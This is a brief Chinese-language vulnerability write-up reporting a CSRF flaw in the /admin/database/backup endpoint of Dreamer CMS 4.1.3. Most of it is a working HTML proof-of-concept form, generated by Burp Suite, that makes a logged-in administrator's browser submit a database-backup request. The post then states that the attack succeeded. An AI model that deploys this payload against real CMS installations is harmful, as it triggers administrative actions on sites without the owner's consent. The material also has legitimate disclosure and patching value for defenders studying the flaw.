梦想家内容管理系统（Dreamer CMS）跨站请求伪造漏洞

目标:GitHub - iteachyou-wjn/dreamer_cms: Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建，支持静态化、标签化建站。不需要专业的后台开发技能，会HTML就能建站，上手超简单；只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段，真正实现“0”代码建网站。

版本：4.1.3

通过组件/admin/database/backup发现包含跨站点请求伪造（CSRF）

创建poc

<html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>    <form action="http://192.168.247.186:8888/admin/database/backup">      <input type="hidden" name="tableName" value="system&#95;adverts" />      <input type="submit" value="Submit request" />    </form>  </body> </html>

成功

本文链接：  https://www.黑客.wang/wen/22.html